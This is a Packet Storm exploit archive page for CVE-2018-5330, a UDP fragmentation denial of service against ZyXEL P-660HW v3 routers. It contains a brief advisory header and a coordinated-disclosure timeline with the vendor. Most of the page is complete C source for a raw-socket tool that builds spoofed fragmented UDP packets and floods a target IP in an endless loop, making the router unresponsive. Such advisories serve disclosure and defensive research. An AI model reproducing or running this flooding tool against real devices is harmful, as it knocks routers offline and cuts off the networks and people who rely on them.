Twenty Year Anniversary

ZyXEL P-660HW UDP Denial Of Service

ZyXEL P-660HW UDP Denial Of Service
Posted Jan 12, 2018
Authored by Hosein Askari

ZyXEL P-660HW suffers from a UDP fragmentation denial of service vulnerability.

tags | exploit, denial of service, udp
advisories | CVE-2018-5330
MD5 | 540f62d029470090796859bb2a8aeed4

ZyXEL P-660HW UDP Denial Of Service

Change Mirror Download
################
#Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service
CVE: CVE-2018-5330
#CWE: CWE-400
#Exploit Author: Hosein Askari
#Vendor HomePage: https://www.zyxel.com/
#Version : v3
#Tested on: ZyXEL P-660HW
#Category: Network Appliance
#Author Mail : hosein.askari@aol.com
#description: ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (router unreachable/unresponsive) via a flood of fragmented UDP packets.
#####################
Vendor status:
[02.01.2018] Vulnerability discovered
[04.01.2018] CVE requestion
[10.01.2018] CVE assigned
[10.01.2018] Contact with the vendor
[11.01.2018] Vendor responds asking for details
[11.01.2018] Sent detailed information to the vendor(exploit, sample of PCAP, video of attack)
[11.01.2018] Vendor assigns appropriate team for coordination
[11.01.2018] Vendor is analyzing the issue
[12.01.2018] Asked vendor for confirmation
[12.01.2018] Vendor replies with confirmation of the issue
#####################
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/udp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
#define change(n) (n)
#else
#define change(n) htons(n)
#endif
#define ip_1 8193
#define head 153
#define u_head 41
#define level 0
// Exploit Author : Hosein Askar
u_long p_rec(u_char *);
void running(u_char *);
void fragmentation(int, u_long, u_long, u_short, u_short, u_short);
int main(int argc, char **argv)
{

int j = 1, i, socks, counter=1, number=1;
u_long s_ip = 0;
u_long d_ip = 0;
u_short s_port = 0;
u_short d_port = 0;
if((socks = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("Error");
exit(1);
}
if (setsockopt(socks, IPPROTO_IP, IP_HDRINCL, (char *)&j, sizeof(j)) < 0)
{
perror("Error");
exit(1);
}

if (argc < 2) running(argv[0]);
if (!(d_ip = p_rec(argv[1])))
{
exit(1);
}

fprintf(stderr, "Attack is started \n");

for (;;) {
counter ++;
s_ip = counter*10;
s_port = counter*10;
d_port = counter+1*10;
if (counter>10)
counter = 1;
for (i = 0; i < 10; i++)
{
fragmentation(socks, s_ip, d_ip, s_port, d_port, number++);
}
}
return (0);
}
void fragmentation(int sock, u_long s_ip, u_long d_ip, u_short s_port,u_short d_port, u_short number)
{
u_char *p = NULL, *pointer = NULL;
u_char byte;
struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = s_port;
sin.sin_addr.s_addr = d_ip;

p = (u_char *)malloc(head + u_head + level);
pointer = p;

byte = 69;
memcpy(pointer, &byte, sizeof(u_char));
pointer += 2;
*((u_short *)pointer) = change(head + u_head + level);
pointer += 2;
*((u_short *)pointer) = htons(number);
pointer += 2;
*((u_short *)pointer) |= change(ip_1);
pointer += 2;
*((u_short *)pointer) = 247;
byte = IPPROTO_UDP;
memcpy(pointer + 1, &byte, sizeof(u_char));
pointer += 4;
*((u_long *)pointer) = s_ip;
pointer += 4;
*((u_long *)pointer) = d_ip;
pointer += 4;
*((u_short *)pointer) = htons(s_port);
pointer += 2;
*((u_short *)pointer) = htons(d_port);
pointer += 2;
*((u_short *)pointer) = htons(8);
if (sendto(sock, p, head + u_head + level, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(p);
exit(1);
}
free(p);
}
u_long p_rec(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void running(u_char *name)
{
fprintf(stderr,
"%s d_ip\n",
name);
exit(0);
}
##########################


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    4 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close